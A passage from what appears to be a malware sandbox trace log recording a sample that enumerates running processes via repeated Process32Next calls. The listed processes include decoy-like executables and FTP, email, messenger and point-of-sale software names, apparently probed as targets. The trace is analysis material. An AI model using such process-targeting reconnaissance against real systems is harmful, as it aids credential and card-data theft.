pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.942] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0213.944] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.945] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0213.947] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0213.948] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0213.951] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0213.952] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0213.954] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0213.957] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.033] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.034] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0214.040] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.041] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0214.043] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.045] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0214.046] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0214.048] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0214.051] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0214.053] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0214.055] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0214.057] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0214.058] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0214.060] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0214.061] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0214.063] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0214.065] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0214.066] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0214.068] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0214.069] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0214.071] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0214.122] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0214.125] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0214.127] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0214.129] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0214.131] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0214.132] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0214.134] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0214.142] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0214.144] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0214.146] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0214.148] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0214.151] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0214.152] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0214.154] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0214.181] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0214.183] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0214.185] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0214.187] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0214.189] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0214.268] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0214.270] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0214.272] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0214.274] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0214.276] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0214.278] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0214.281] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0214.283] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0214.285] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0214.287] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0214.288] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0214.290] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0214.292] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0214.294] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0214.296] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0214.298] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0214.300] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0214.302] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0214.339] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0214.341] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0214.343] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0214.348] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0214.350] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0214.352] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0214.354] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0214.355] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0214.358] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0214.360] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0214.361] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0214.363] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0214.365] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0214.366] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0214.368] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, 